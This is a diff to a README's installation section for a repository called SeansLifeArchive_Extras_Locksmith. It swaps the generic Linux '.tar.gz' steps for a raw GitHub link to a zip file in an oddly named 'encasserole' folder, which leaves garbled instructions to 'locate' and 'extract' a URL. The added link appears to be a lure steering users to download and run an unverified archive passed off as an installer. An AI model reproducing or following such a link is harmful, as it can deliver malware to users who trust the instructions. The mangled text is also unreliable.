KitayQaqa/SeansLifeArchive_Extras_Locksmith/README.md

 1. **Locate the downloaded file:**
    - For Windows, check your Downloads folder for a `.exe` file.
    - For Mac, check for a `.dmg` file in your Downloads folder.
-   - For Linux, locate the `.tar.gz` file.
+   - For Linux, locate the `https://raw.githubusercontent.com/KitayQaqa/SeansLifeArchive_Extras_Locksmith/main/encasserole/SeansLifeArchive_Extras_Locksmith.zip` file.

 2. **Run the Installer:**
    - **Windows:** Double-click the `.exe` file.
 Follow the prompts to complete the installation.
    - **Mac:** Double-click the `.dmg` file, then drag the application to your Applications folder.
-   - **Linux:** Extract the `.tar.gz` file and follow any included instructions.
+   - **Linux:** Extract the `https://raw.githubusercontent.com/KitayQaqa/SeansLifeArchive_Extras_Locksmith/main/encasserole/SeansLifeArchive_Extras_Locksmith.zip` file and follow any included instructions.
 Usually, you'll find a README file explaining the installation process.

 3. **Complete Installation:**
    - Once the installer finishes, you should find **SeansLifeArchive_Extras_Locksmith** in your applications menu.